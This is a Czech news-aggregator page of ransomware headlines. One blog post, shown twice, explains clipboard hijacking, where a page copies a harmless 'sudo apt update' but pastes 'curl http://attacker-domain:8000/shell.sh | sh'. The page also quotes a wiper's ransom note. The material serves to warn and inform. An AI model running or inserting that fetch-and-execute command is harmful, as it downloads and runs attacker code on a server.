Registrace •  Přidání RSS zdroje
Kurzy ze dne: 07.10.2022 || EUR 24,515 || USD 25,028
pátek 7.října 2022, Týden: 41, Den roce: 280,  dnes má svátek Justýna, zítra má svátek Věra
7.října 2022, Týden: 41, Den roce: 280,  dnes má svátek Justýna


( Nalezeno 100 článků )

Ransomware, hack serveru přes CTRL+V, video zátah na gang REvil

staré Ransomware, hack serveru přes CTRL+V, video zátah na gang REvil
Výstavba a stěhování do nového domu způsobilo, že jsem na dlouhou dobu zmizel a neměl čas tuhle one-man-show živit žádným obsahem. Věřím, že nyní to bude o něco lepší, nicméně pro jistotu doporučuji odebírat novinky například tak, že v pravé části stránky zadáte svoji e-mailovou adresu a budete o nich obratem informováni. Pozitivní zprávou může být to, že tahle životní etapa přinesla i můj posun v oblasti IOT (Internet of things), tedy orientaci v chytrých zařízeních připojených k internetu. Někdy příště se tak rád podělím například o zkušenosti s chytrým elektrickým uzávěrem vody, který krásně ukazuje paradoxy některých těchto chytrých zařízení. Ten můj například vodu neuzavře, pokud Vám zrovna vypadlo spojení do internetu a nebo mají čínské cloud servery výpadek. A to přitom stojíte o 1 metr vedle a jste na stejné WiFi síti jako ventil… Prostě smůla! Nyní tedy alespoň přehled toho, co mě zaujalo v lednu 2022. Jak se nechat hacknout přes copy / paste Pointa je celkem jednoduchá. Na webové stránce uvidíte nějaký text, který je předurčen k tomu, abyste ho zkopírovali do schránky (CTRL+C). Díky možnostem javaskriptu se ale útočník postará o to, že následný stisk CTRL+V (případně jiná klávesová zkratka) vloží úplně něco jiného, než to, co očekáváte, že je ve schránce. A když si tohle představíte v kontextu správy serveru, kdy si administrátor pomáhá tím, že hledá po internetu různé postupy a návody (typicky stackoverflow.com) a práce v terminálu probíhá stylem, že příkazy z návodu jede stylem copy / paste, může být na prů*er zaděláno! Místo nevinného příkazu zkopírovaného z webu pomocí CTRL+C: sudo apt update (případ distribuce Debian) se do terminálu vloží například: curl http://attacker-domain:8000/shell.sh | sh Tedy příkaz, který z internetu stáhne škodlivý skript a následně ho na serveru spustí. To vše se navíc stane automaticky bez toho, aby to mohl admin zarazit (leda že by byl sakra rychlej). Za příkazem totiž následuje sekvence neviditelných znaků pro odřádkování, tedy automatického stisku klávesy ENTER (sekvence )! Celou ideu si můžete osobně vyzkoušet na této stránce: https://www.wizer-training.com/blog/copy-paste. Jak jednoduché a přitom tak zákeřné! VIDEO: Zátah na gang stojící za ransomwarem REvil O ransomwaru REvil jsem na viry.cz psal několikrát obvykle v souvislosti s postupnou evolucí této havěti. V září 2021 jsem psal o REvil prvně pozitivně. Objevil se totiž dekryptor pro obnovu zašifrovaných souborů pro všechny uživatele, jenž se stali obětí útoku do 13. července 2021. Bylo to výsledkem zátahu policie či jiných bezpečnostních složek někde ve světě. Nyní zasáhla i ruská FSB. Výsledkem je konfiskace 20 luxusních aut a zabavení financí v hodnotě kolem 130 milionů Kč! Sestřih ze zásahů je k vidění na Youtube. Všimněte si, že FSB použila též metodu sociálního inženýrství. Před dveřmi stál nevinně vypadající člověk v montérkách, který chtěl možná provést jen odečet vody Destruktivní havěť vydávající se za “umírněný” ransomware Dle zprávy Microsoftu jsou Ukrajinské organizace pod útokem destruktivní havěti, která se vydává za ransomware. S pointou ransomwaru ale sdílí jen to, že za obnovu zašifrovaných souborů požaduje zaplatit BTC výkupné v hodnotě 10 tisíc dolarů. Žádná možnost obnovy dat ale neexistuje. Původní obsah souborů je totiž surově přepsán bez šifrovacího algoritmu. Přepsán je i zavadeč – MBR disku, takže počítač hned po zapnutí zobrazí tyto instrukce: Your hard drive has been corrupted. In case you want to recover all hard drives of your organization, You should pay us $10k via bitcoin wallet 1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv and send message via tox ID 8BEDC411012A33BA34F49130D0F186993C6A32DAD8976F6A5D82C1ED23054C057ECED5496F65 with your organization name. We will contact you to give further instructions. Platit se ale organizacím evidentně nechce, na bitcoinové adrese se totiž nacházejí necelých 5 dolarů The post Ransomware, hack serveru přes CTRL+V, video zátah na gang REvil appeared first on VIRY.CZ. ...chcete vědět víc?
staré Ransomware se mění, místo šifrování dat je poškozuje a ničí
Hackeři zabývající se ransomwarem v poslední době mění svou strategii jak ze svých obětí vylákat peníze. Data už nešifrují, neboť je zde riziko jejich dešifrování bez platby výkupného. Novou metodou je poškozování dat a jejich ničení.
staré Sophos: Ransomware vloni nejčastěji cílil na média a maloobchod
Ransomwarem bylo v roce 2021 zasaženo 77 % maloobchodních organizací, zatímco v roce 2020 to bylo 44 %; představuje to 75% nárůst.
staré Ransomware zásadně mění taktiku útoků. Šifruje jen část souborů, takže je ještě rychlejší a nebezpečnější
Stále více skupin ransomwaru používá novou taktiku, která pomáhá rychleji zašifrovat soubory v systému obětí a zároveň snižuje šanci na včasné odhalení a zastavení. Přerušované šifrování („intermittent encryption“) spočívá v zašifrování pouze části obsahu cílových souborů, informuje web Bleeping ...
staré Vyděračům nic neplaťte: Co je ransomware a jaké škody může napáchat?
Škodlivých programů útočících na obsah počítačů či telefonů je v dnešní řadě čím dál více. Každým dnem pak přibývají další a další sofistikované nástroje hackerů, jak z uživatelů vymámit citlivá data a finanční prostředky. Mezi časté prostředky k útoku pak patří právě ransomware. Co je to ransomware? Ransomware je specifický druh malwaru, který data ve vašem telefonu nebo počítači zašifruje, a za jejich odblokování pak zpravidla požaduje výkupné. Sofistikovanější ransomware programy jsou pak schopny zablokovat i celé zařízení a znemožnit jeho další užívání. Odkud se ransomware bere? Nejčastějšími zdroji veškerého malwaru jsou pochybné či nebezpečné weby, odkud se program do počítače stáhne
staré Acronis: Ransomware způsobí do roku 2023 škody za 30 miliard dolarů
Kyberútoky jsou podle bezpečnostních expertů aktuálně zodpovědné za více než třetinu všech provozních výpadků.
staré Odborný webcast: Ransomware v roce 2022
Víte, jak moc nás letos potrápily ransomwarové bezpečnostní incidenty? Víte, že si takový útok může kdokoli koupit jako službu? Víte, jaký zvolit postup, když jste napadeni. Víte, jak si jako prevenci vytvořit „Ransomwarový štít“? To vše se dozvíte, když se registrujte na náš odborný webcast.
staré Ransomware je největší hrozbou pro firmy a organizace všech velikostí
Podle zprávy Acronis Cyberthreats Report, která vyhodnocuje trendy kybernetických hrozeb v první polovině roku 2022, je na vině především narůstající komplexnost IT infrastruktur - to vede ke zvýšení úrovni rizik a k vyššímu množství útoků. Do roku 2023 je výše škod způsobených ransomwarem odhadována na 30 miliard dolarů. [ 31.srpna 2022 - středa ]
staré Pozvánka na webcast: Ransomware v roce 2022
Jak si vytvořit „Ransomwarový štít“ – neboli účinnou strategii pro prevenci, obranu a obnovu? Zjistíte ve webcastu kolegů z Computerworldu, na který vás tímto srdečně zveme.
staré Cisco: Ransomware se v rámci kyberhrozeb propadl na druhé místo
V čele žebříčku se umístil komoditní malware s 20% podílem. Mezi frekventované hrozby patří i phishing či BEC.
staré Postřehy z bezpečnosti: ransomware na třetí přes jedno špatné zabezpečení
V dnešním díle Postřehů se podíváme na aktivně zneužívané zranitelnosti v platformě Zimbra, úspěšný průnik do sítě společnosti Cisco i tři ransomwarové útoky na jednu organizaci v průběhu dvou týdnů.
staré Ransomware v praxi – jak hackeři útočí a co s tím dělat
Výskyt ransomware útoků neustále roste a dříve nebo později se týká každé firmy a instituce naprosto bez výjimky. Jejich scénáře se neustále opakují, a proto je dobré se podívat na to, jak fungují....
staré Stali ste sa obeťou ransomware útoku? Europol radí, ako by ste sa mali zachovať. Hlavne žiadnu paniku!
Počet ransomware útokov každým rokom rastie. Množstvo úkonov komunikácie sa totiž nielen vplyvom pandémie muselo presunúť do online priestoru. Svoje vlastné siete si museli vytvoriť napríklad aj menšie podniky, ktoré ale ich ochranu často podcenia a preto sú ľahkým terčom pre aktérov hrozieb. Za celkovým zvýšeným počtom rôznych útokov samozrejme stojí aj vojna u našich východných susedov. … The post Stali ste sa obeťou ransomware útoku? Europol radí, ako by ste sa mali zachovať. Hlavne žiadnu paniku! appeared first on Vosveteit.sk.
  • Stali ste sa obeťou ransomware útoku? Europol radí, ako by ste sa mali zachovať. Hlavne žiadnu paniku!
  • Vosveteit.sk
  • staré Internetom lomcuje nový ransomware OORI. Obete máme už aj na Slovensku!
    staré Ransomware není na ústupu. Útočí s ještě ničivější silou
    Vyděračské viry z rodiny ransomwarů představují nejobávanější hrozbu několik posledních let. I když se podle virových statistik mohlo zdát, že jsou na ústupu, objevují se stále. A co je možná ještě horší, útočí s ještě ničivější silou. Vyplývá to z rozsáhlé analýzy společnosti Fortinet za druhé pololetí roku 2021, která byla nedávno zveřejněna.
    staré Fortinet: Ransomware není na ústupu, útočí stále a s ničivějšími účinky
    Na ochranu před širokým spektrem hrozeb musí podniky zavádět strategie prevence, detekce a reakce podporované umělou inteligencí a založené na bezpečnostní mesh architektuře.
    staré Ransomware neustupuje, útočí se stále ničivějšími účinky
    Svou nejnovější pololetní zprávu o bezpečnostní situaci FortiGuard Labs Global Threat Landscape Report vydala společnost Fortinet. Informace o hrozbách z druhé poloviny roku 2021 odhalují nárůst automatizace a rychlosti útoků, což ukazuje na pokročilejší strategie perzistentní kybernetické kriminality, která je ničivější a hůře předvídatelná. Kyberzločinci se navíc začali větší měrou zaměřovat na zneužívání prostoru, který v bezpečnostním prostředí vznikl v souvislosti s hybridním modelem práce a hybridním IT.
    staré FortiGuard Labs upozorňuje: ransomware útočí stále a s ničivějšími účinky
    Společnost Fortinet představila svou nejnovější pololetní zprávu o bezpečnostní situaci FortiGuard Labs Global Threat Landscape Report. Informace o hrozbách z druhé poloviny roku 2021 odhalují nárůst automatizace a rychlosti útoků, což ukazuje na pokročilejší strategie perzistentní [...] Článek FortiGuard Labs upozorňuje: ransomware útočí stále a s ničivějšími účinky se nejdříve objevil na IT Revue.
  • [...]
  • FortiGuard Labs upozorňuje: ransomware útočí stále a s ničivějšími účinky
  • IT Revue
  • staré Továrnu Foxconnu napadl ransomware Lockbit 2.0
    Společnost Foxconn se potýká s následky napadení ransomwarem, což postihlo konkrétně jednu z jejích mexických továren, a to konkrétně v Tijuaně. Jde tu tak o provoz, který vyrábí především pro USA.
    staré Nový ransomware nutí lidi provést tři dobré skutky
    Ransomware začal jako malware, jehož prostřednictvím útočníci žádali platbu za poskytnutí klíče k dešifrování dat. Později začali své útoky cílit na konkrétní firmy a žádat výkupné i za ukradená data a nyní je tu opět něco nového. 
    staré Sophos: Ransomware platí více organizací, výkupné roste
    Představa, že zaplacení výkupného výměnou za dešifrovací klíč je nejrychlejší cesta k nápravě, je lákavá, podle Sophosu se ovšem nejedná vždy o nejlepší řešení.
    staré QNAP žádá uživatele svých NAS, aby aktualizovali systém, hrozí jim ransomware
    Společnost QNAP vyzývá majitele svých modelů NAS k tomu, aby pokud možno co nejdříve provedli aktualizaci systému QTS v případě, že využívají jednu ze dvou verzí, které hrozí vyděračský malware. 
    staré Průzkum: Ransomware stále největší hrozbou, Češi platí výkupné častěji
    Zatímco před několika lety patřili české firmy mezi nejdisciplinovanější oběti, dnes už jich zaplatí výkupné téměř třetina. Výrazně navíc stoupl počet zasažených institucí. Oproti 30 % napadených firem z roku 2020 jich loni ransomwarový útok zaznamenalo celých 77 %. Téměř třetina českých podniků (32 %) navíc udělala to, proti čemu varují všichni bezpečnostní analytici: Zaplatila výkupné. Ačkoli dříve Češi platili za jedny z nejdisciplinovanějších, míra ochoty zaplatit se s počtem napadených firem rapidně zvýšila. Výkupné není řešením 32 % firem zaplatilo výkupné v ceně mezi 100 a 250 tisíci dolary, 29% dokonce mezi 250 a 500 tisíci dolary. 46 % podniků výkupné zaplatilo, i
    staré Ruský ransomware postihl významného dodavatele firem Boeing a Lockheed Martin
    Už jako ohrožení národní bezpečnosti by USA mohly brát ransomwarový útok na firmu Parker Hannifin Corporation, která dodává své produkty nejen společnostem Boeing a Lockheed Martin. 
    staré Ransomware WannaCry stále představuje riziko pro kritickou infrastrukturu
    WannaCry pro své šíření využívá zranitelnost neboli exploit v operačním systému Windows nazvaný EternalBlue. Ačkoli Microsoft chybu již v dubnu 2017 objevil a opravil, ransomware se přesto následující měsíc rozšířil do celého světa. Bezpečnostní specialisté z ESETu jej dodnes celosvětově detekují. [ 12.května 2022 - čtvrtek ]
    staré Útočníci se chovají sezónně. Teď třeba posílají ransomware na zemědělce, kteří osévají pole
    I hackerské útoky se řídí podle ročních období. Jaro se nese ve znamení osévání polí, mezi nejohroženější skupiny lidí se proto v posledních týdnech dostali zemědělci. Varoval před tím americký Federální úřad pro vyšetřování (FBI) a jen chvíli poté, co upozornění vydal, masivní ransomwarový útok ...
    staré V Česku se stále vyskytuje ransomware WannaCry, napadá nezáplatované počítače
    V České republice je stále detekován ransomware WannaCry, který se masivně začal šířit v roce 2017 a který využívá zranitelnost EternalBlue. Počet detekcí ale výrazně klesl. Ještě v roce 2019 byly denně detekovány stovky tisíc pokusů o zneužití. Hlavním vektorem šíření jsou e-maily.
    staré Pozor, toto nie je aktualizácia Windowsu, ale ransomware! Dávajte si pozor, čo sťahujete do svojho počítača
    Hackeri neustále hľadajú nové spôsoby, ako sa dostať do našich zariadení, aby získali na úkor nič netušiacich obetí výhodu. V posledných rokoch sa spomínajú najmä kybernetické útoky na naše smartfóny. Mohlo by sa zdať, že hackerov počítače už nezaujímajú. Opak je ale pravdou, upozorňuje portál latesthackingnews.com. Najnovší ransomware sa tvári ako aktualizácia Windowsu! Portál konkrétne upozorňuje … The post Pozor, toto nie je aktualizácia Windowsu, ale ransomware! Dávajte si pozor, čo sťahujete do svojho počítača appeared first on Vosveteit.sk.
  • Pozor, toto nie je aktualizácia Windowsu, ale ransomware! Dávajte si pozor, čo sťahujete do svojho počítača
  • Vosveteit.sk
  • staré Zákeřný ransomware Onyx nejprve ukradne data, velké soubory pak nezašifruje, ale úplně zničí
    Bezpečnostní experti z MalwareHunterTeam oznámili na sociální síti Twitter objevení nového ransomwaru Onyx. Od většiny podobných škodlivých aplikací se liší zejména tím, že velké soubory v napadených počítačích místo šifrování přepisuje náhodnými daty, čímž je nevratně poškozuje. Podobně, jako ...
    staré Sophos: Téměř osm z deseti českých organizací zasáhl ransomware
    Průměrné zaplacené výkupné globálně vzrostlo téměř pětinásobně, přičemž 46 % organizací, jejichž data byla při ransomwarovém útoku zašifrována, výkupné zaplatilo.
    staré Sophos zpřístupnil The Ransomware Threat Intelligence Center
    Sophos, celosvětový lídr v řešeních kybernetického zabezpečení nové generace, spustil Ransomware Threat Intelligence Centrum. Nabízí zde sbírku článků a reportů vycházejících z kontinuálních výzkumů bezpečnostních hrozeb prováděných výzkumníky hrozeb a bezpečnostními analytiky Sophos a SophosLabs. Veřejně dostupné úložiště [...]
  • [...]
  • staré Nejrychlejší ransomware zašifruje 53 GB dat i za méně než pět minut
    Benchmarky jsme tu už měli různé, ale že bychom psali o testu různých verzí ransomwaru z toho pohledu, jak rychle dokáže na napadeném počítači zašifrovat data, to se zrovna nestává. Jak si tedy vedou různé verze?
    staré Postřehy z bezpečnosti: automobilový gigant pod útokem ransomware
    Dnes se opět podíváme na několik témat souvisejících s boji na Ukrajině, ale také na ransomware útok na velkého výrobce dílů pro automobilový průmysl, či na DoS zranitelnost v OpenSSL.
    staré ESET spolupracuje s Intelem, ransomware budou detekovat na úrovni hardwaru
    Společnost ESET integruje do své vícevrstvé ochrany koncových bodů technologie od společnosti Intel. Vylepšený balík ochrany posílí detekce ransomwaru bez dopadů na výkon systému. Slovenská antivirová společnost se rozhodla integrovat Intel Threat Detection Technology (Intel TDT) do svého kyberbezpečnostního řešení pro koncové body Endpoint Security. Spolupráce obou společností poskytne zákazníkům novou komplexní ochranu jak na softwarové, tak hardwarové úrovni, a znamená další krok vpřed v boji proti ransomwarovým hrozbám. S ohledem na komplexní a neustále se vyvíjející povahu ransomwaru, který představuje stále větší hrozbu pro pracovní i osobní život jejích zákazníků, se společnost ESET rozhodla obohatit své softwarové detekční technologie
    staré Mezi NAS Asustor se šíří ransomware DeadBolt, doporučuje se je odpojit
    Pokud využíváte jisté modely NAS značky Asustor, měli byste přinejmenším zvážit možnost jejich dočasného odpojení od Internetu, neboť aktuálně se šíří ransomware DeadBolt zaměřující právě NAS této značky.
    staré Ransomware DeadBolt už dobyl i Asustor. NAS raději preventivně odpojte od internetu
    Je to přesně měsíc, co vyděračský software DeadBolt vyděsil uživatele NASů značky Qnap. Stejný ransomware teď podle ohlasů na Redditu útočí i na zařízení od Asustoru. Zašifruje data uložená na serveru a uživatelé musí zaplatit 0,03 BTC (zhruba 25 tisíc korun), aby získali klíč k ...
    staré Týden na ITBiz: Destruktivnější ransomware a útoky na satelitní systémy
    Bude 5G v budoucnosti motorem ekonomiky?  DevOps naráží v podnicích na řadu problémů. Intel koupí Tower Semiconductor, AMD dokončuje převzetí Xilinxu. Bude 5G v budoucnosti motorem ekonomiky? (Dell) Pátá generace mobilní datové komunikace (5G) je již nějakou dobu jedním z nejdůležitějších pilířů rozvoje digitální ekonomiky a související transformace. Díky robustnější bezdrátové infrastruktuře se nám podaří propojit …
    staré Cryptojacking a ransomware útoky cílí na Linux systémy
    Linux - jako nejběžnější cloudový operační systém, se pro útočníky rychle stává vstupní branou do veřejných a privátních cloudových implementací. Současná opatření proti malwaru se většinou zaměřují na řešení hrozeb namířených na systém Windows. [ 17.února 2022 - čtvrtek ]
    staré Ransomware, hack serveru přes CTRL+V, video zátah na gang REvil
    Výstavba a stěhování do nového domu způsobilo, že jsem na dlouhou dobu zmizel a neměl čas tuhle one-man-show živit žádným obsahem. Věřím, že nyní to bude o něco lepší, nicméně pro jistotu doporučuji odebírat novinky například tak, že v pravé části stránky zadáte svoji e-mailovou adresu a budete o nich obratem informováni. Pozitivní zprávou může být to, že tahle životní etapa přinesla i můj posun v oblasti IOT (Internet of things), tedy orientaci v chytrých zařízeních připojených k internetu. Někdy příště se tak rád podělím například o zkušenosti s chytrým elektrickým uzávěrem vody, který krásně ukazuje paradoxy některých těchto chytrých zařízení. Ten můj například vodu neuzavře, pokud Vám zrovna vypadlo spojení do internetu a nebo mají čínské cloud servery výpadek. A to přitom stojíte o 1 metr vedle a jste na stejné WiFi síti jako ventil… Prostě smůla! Nyní tedy alespoň přehled toho, co mě zaujalo v lednu 2022. Jak se nechat hacknout přes copy / paste Pointa je celkem jednoduchá. Na webové stránce uvidíte nějaký text, který je předurčen k tomu, abyste ho zkopírovali do schránky (CTRL+C). Díky možnostem javaskriptu se ale útočník postará o to, že následný stisk CTRL+V (případně jiná klávesová zkratka) vloží úplně něco jiného, než to, co očekáváte, že je ve schránce. A když si tohle představíte v kontextu správy serveru, kdy si administrátor pomáhá tím, že hledá po internetu různé postupy a návody (typicky stackoverflow.com) a práce v terminálu probíhá stylem, že příkazy z návodu jede stylem copy / paste, může být na prů*er zaděláno! Místo nevinného příkazu zkopírovaného z webu pomocí CTRL+C: sudo apt update (případ distribuce Debian) se do terminálu vloží například: curl http://attacker-domain:8000/shell.sh | sh Tedy příkaz, který z internetu stáhne škodlivý skript a následně ho na serveru spustí. To vše se navíc stane automaticky bez toho, aby to mohl admin zarazit (leda že by byl sakra rychlej). Za příkazem totiž následuje sekvence neviditelných znaků pro odřádkování, tedy automatického stisku klávesy ENTER (sekvence )! Celou ideu si můžete osobně vyzkoušet na této stránce: https://www.wizer-training.com/blog/copy-paste. Jak jednoduché a přitom tak zákeřné! VIDEO: Zátah na gang stojící za ransomwarem REvil O ransomwaru REvil jsem na viry.cz psal několikrát obvykle v souvislosti s postupnou evolucí této havěti. V září 2021 jsem psal o REvil prvně pozitivně. Objevil se totiž dekryptor pro obnovu zašifrovaných souborů pro všechny uživatele, jenž se stali obětí útoku do 13. července 2021. Bylo to výsledkem zátahu policie či jiných bezpečnostních složek někde ve světě. Nyní zasáhla i ruská FSB. Výsledkem je konfiskace 20 luxusních aut a zabavení financí v hodnotě kolem 130 milionů Kč! Sestřih ze zásahů je k vidění na Youtube. Všimněte si, že FSB použila též metodu sociálního inženýrství. Před dveřmi stál nevinně vypadající člověk v montérkách, který chtěl možná provést jen odečet vody Destruktivní havěť vydávající se za “umírněný” ransomware Dle zprávy Microsoftu jsou Ukrajinské organizace pod útokem destruktivní havěti, která se vydává za ransomware. S pointou ransomwaru ale sdílí jen to, že za obnovu zašifrovaných souborů požaduje zaplatit BTC výkupné v hodnotě 10 tisíc dolarů. Žádná možnost obnovy dat ale neexistuje. Původní obsah souborů je totiž surově přepsán bez šifrovacího algoritmu. Přepsán je i zavadeč – MBR disku, takže počítač hned po zapnutí zobrazí tyto instrukce: Your hard drive has been corrupted. In case you want to recover all hard drives of your organization, You should pay us $10k via bitcoin wallet 1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv and send message via tox ID 8BEDC411012A33BA34F49130D0F186993C6A32DAD8976F6A5D82C1ED23054C057ECED5496F65 with your organization name. We will contact you to give further instructions. Platit se ale organizacím evidentně nechce, na bitcoinové adrese se totiž nacházejí necelých 5 dolarů The post Ransomware, hack serveru přes CTRL+V, video zátah na gang REvil appeared first on VIRY.CZ.
  • https://www.wizer-training.com/blog/copy-paste
  • psal několikrát
  • Dle zprávy Microsoftu
  • Ransomware, hack serveru přes CTRL+V, video zátah na gang REvil
  • VIRY.CZ
  • staré QNAP nuceně instaluje aktualizaci poté, co ransomware DeadBolt zašifroval 3 600 NASů této značky
    Tchajwanská firma QNAP nuceně aktualizovala zařízení NAS svých zákazníků. Nejnovější aktualizace obsahuje záplatu bezpečnostní díry, kvůli níž více než 3600 síťových úložišť této značky napadl ransomware DeadBolt. Informace o útoku, namířeném na NASy QNAP obsahující zero-day zranitelnost, se ...
    staré Záludný ransomware DeadBolt šifruje NASy QNAP a požaduje výkupné ve výši 25 tisíc korun
    Nová skupina ransomwaru DeadBolt se zaměřuje na síťová úložiště (NAS) značky QNAP. Dle informací webu Bleeping Computer zneužívá zero-day chybu a modifikuje software zařízení tak, aby se místo přihlašovací obrazovky zobrazoval požadavek na výkupné. Útoky začaly v úterý 25. ledna, kdy řada ...
    staré Ransomware jako nástroj odboje: Hacktivisté paralizovali dopravu ruské techniky v Bělorusku
    Hacktivisté vzali jako pomyslné rukojmí běloruské železnice. Napadení sítí a databází nemá za cíl získat finanční výkupné, jak je v těchto případech běžné. Cílem anonymní skupiny aktivistů je osvobození politických vězňů a zamezení přesunu ruských vojsk přes území Běloruska. Ransomware staví na primitivním konceptu: Zašifruje soubory na disku, které nejdou odblokovat bez šifrovacího klíče. Jednoduché, ale brilantní – firmy, které nezálohují, nebo které zálohují a nemohou si kvůli byznysu dovolit ani několikahodinový výpadek při obnovování záloh, raději za obnovu dat zaplatí výkupné. V případě hacktivistů nicméně nejde o výkupné, ale o dosažení určitých politických či jinak motivovaných podmínek. Kdo je
    staré Ransomware útočí: Co udělat, abyste mu nepodlehli?
    Ransomeware momentálně představuje nejzávažnější hrozbu v kybernetickém světě. Pokud se v Česku podnik rozhodne zaplatit výkupné, v průměru jej to stojí 200 000 Kč.
    staré Ransomware stále zůstává nejčastější a nejrozšířenější kybernetickou hrozbou
    S Patrickem Müllerem, regionálním manažerem společnosti Sophos pro východní Evropu, jsme se zaměřili na aktuální bezpečnostní hrozby, stav ransomwaru, funkční koncept ekosystému podnikového zabezpečení a roli partnerů v bezpečnostním byznysu....
    staré Cisco: Aktivity hackerů jsou bezprecedentní, ransomware bude řádit i napřesrok
    Cisco Talos přichází s přehledem nejzásadnějších kyberbezpečnostních událostí v roce 2021. Zároveň zdvihá varovný prst před dalším boomem ransomwarových útoků.
    staré Ransomware srdcem podzemní ekonomiky
    Ransomwarové gangy využívají všechny základní prvky klasických podniků – včetně definovaných rolí personálu, marketingových plánů, partnerských ekosystémů, a dokonce i investic do rizikového kapitálu – a k tomu samozřejmě mají některé typické rysy tradičnějších zločineckých podniků.
    staré Nové strategie ransomware útočníků
    Aktéři ransomwarových hrozeb se zaměřují na menší počet útoků proti velkým organizacím a vznikl celý ilegální ekosystém, který podporuje činnost ransomwarových gangů. Nejčastějšími cíli byly v roce 2021 subjekty ve vládním a průmyslovém sektoru. [ 9.prosince 2021 - čtvrtek ]
    staré Příští rok budou trendy hlasové deepfakes, ransomware a malware těžící kryptoměny
    Odborníci na kybernetickou bezpečnost v Avastu připravili prognózu vývoje kyberhrozeb v roce 2022. Předpovídají, že kyberzločinci pokročí ve vývoji účinnosti ransomwaru, i nadále budou podvádět s kryptoměnami, loupit na burzách a šířit malware těžící kryptoměny. Analytici také očekávají útoky zneužívající firmy, jejichž zaměstnanci pracují z domova.
    staré Top softwarové hrozby 2021: Vyděračský ransomware, podvody s pandemií a falešné aplikace
    Společnost Avast, globální lídr v oblasti digitální bezpečnosti a ochrany soukromí, shrnula nejčastější kybernetické hrozby tohoto roku. Kyberzločinci i letos využívali pandemie covid-19 a nových online návyků, které jsme si vytvořili. Kyberzločinu nadále vévodil malware, hlavně ransomware, a podvody v oblasti kryptoměn. Mobilní zařízení a jejich majitele pak nejčastěji ohrožoval reklamní adware a fleeceware. „Pandemie změnila téměř všechny aspekty života každého z nás, a to se týká i kybernetického světa,“ říká Michal Salát, který v Avastu vede tým analytiků […]
    staré Ransomware kyberzločinu dominuje, hackerům se vyplácí
    Digitální zločinci se stále častěji obrací na ransomware. Důvody jsou jasné: Je výdělečný a poměrně jednoduchý. Ransomware je založený na primitivním konceptu: Zašifruje soubory na disku, které nejdou odblokovat bez šifrovacího klíče. Jednoduché, ale brilantní – firmy, které nezálohují, nebo které zálohují a nemohou si kvůli byznysu dovolit ani několikahodinový výpadek při obnovování záloh, raději zločincům zaplatí. Jak si udělat botnet? Placené kurzy pro zločince Stojí je to méně než ztráta dat v případě těch, kteří stále ještě nezálohují, nebo výpadek byznysu u 24/7 služeb. Černá díra kyberzločinu Bezpečnostní společnost Sophos v průzkumu zmiňuje, že se ransomware proměnil v takovou malou
    staré Ransomware útočí na weby s redakčním systémem WordPress a požaduje výkupné
    Koncem minulého týdne proběhla nová vlna útoků, během které bylo napadeno více než 300 webů běžících na redakčním systému WordPress. Na postižených stránkách se místo obsahu zobrazoval text požadující zaplacení výkupného ve výši 0,1 bitcoinu, tj. asi 130 tisíc korun. O podrobnostech informuje ...
    staré Ochrana před ransomware v reálném čase
    ESET představuje aktualizovanou nabídku produktů pro celou rodinu, práci z home office s rozšířením o funkci LiveGuard, vylepšeným správcem hesel a inovovaným portálem pro správu produktů pro domácnosti ESET HOME. Aktualizace zahrnuje ESET NOD32 Antivirus, Internet Security a Smart Security Premium. [ 18.listopadu 2021 - čtvrtek ]
    staré Týden na ITBiz: Kdo neplatí výkupné za ransomware
    Bitcoin na maximu. Přibývá chytrých televizí. Intel čeká nižší  marže. PayPal chce prý převzít Pinterest. Red Hat novými aktualizacemi podporuje edge computing Red Hat představil řešení určená k zajištění konzistence otevřeného hybridního cloudu v nejvzdálenějších částech podnikové sítě Red Hat OpenShift 4.9 a Red Hat Advanced Cluster Management for Kubernetes 2.4. Nové možnosti, mezi něž …
    staré Hackerské skupině REvil kdosi hacknul platební portál, přes který vybírala výkupné za ransomware
    Notoricky známá hackerská skupina REvil, která vydírala své oběti prostřednictvím ransomwaru, okusila svou vlastní medicínu – někdo totiž hacknul její platební portál a blog. Svým způsobem je to ironické, nicméně ve vzduchu visí zásadní otázka: kdo vlastně stojí za útokem? O kauze z internetového ...
    staré NÚKIB: Do Česka se vrátil ransomware a incidenty rostou ve vzdělávacích institucích
    Září se podle Národního úřadu pro kybernetickou a informační bezpečnost stalo prozatím nejklidnějším měsícem letošního roku. NÚKIB řešil pouze pět incidentů a žádný neměl závažné dopady, aby byl klasifikovaný jako významný.
    staré Riziko pro finanční sektor: Dopadá na něj ransomware
    Ransomwarem bylo v loňském roce zasaženo 34 % organizací ze sektoru finančních služeb, přičemž 51 % z nich potvrzuje, že při nejvýznamnějším útoku se kyberzločincům podařilo zašifrovat jejich data. Průměrný účet za nápravu útoku ransomwaru v oblasti finančních služeb zohledňující prostoje, strávený čas, náklady na zařízení a síť, ztracené příležitosti, zaplacené výkupné a další, činil 2,1 milionu USD. Tvrdí to společnost Sophos, která zveřejnila zjištění svého celosvětového průzkumu The State of Ransomware in Financial Services 2021.
    staré Redakční Speciál: Ransomware útočí
    Ransomware se stal doslova černou můrou všech organizací i jednotlivců – experti jej dokonce považují za momentálně nejzávažnější hrozbu v kybernetickém světě. Co je však nejhorší, že se jej stále nedaří dostat pod kontrolu. Lze se mu nějak bránit? Odpovědi vám přináší náš tematický speciál.
    staré Absolutní ochrana před ransomware
    Platforma pro ochranu koncových bodů - Kaspersky Endpoint Security Cloud - dokázala ve všech třech scénářích AV-TESTu zcela zablokovat 100% ransomware útoků, přičemž se útočníkům nepodařilo zašifrovat ani jeden uživatelský soubor a hrozby byly z chráněného systému odstraněny. [ 6.října 2021 - středa ]
    staré USA uvalí sankce na firmu SUEX OTC registrovanou v ČR kvůli ransomware
    Washington - Americká vláda dnes oznámila, že uvalí sankce na firmu SUEX OTC, která je registrovaná v České republice. Jmenovaná kryptoburza, která podle AP funguje přes pobočky v Rusku,...
    staré USA uvalí sankce na firmu SUEX OTC registrovanou v ČR kvůli ransomware
    Washington - Americká vláda dnes oznámila, že uvalí sankce na firmu SUEX OTC, která je registrovaná v České republice. Jmenovaná kryptoburza, která podle AP funguje přes pobočky v Rusku,...
    staré Ransomware již nabyl podoby organizovaného zločinu
    Nejúčinnější metodou pro uživatele jak se bránit, je spolehlivá ochrana dat proti odcizení, zneužití nebo znepřístupnění prostřednictvím ransomware útoku. Díky tomu je v případě nějakých problémů možná rychlá obnova dat z bezpečné zálohy. [ 8.září 2021 - středa ]
    staré Cisco: Největší hrozbou ve druhém čtvrtletí 2021 byl ransomware
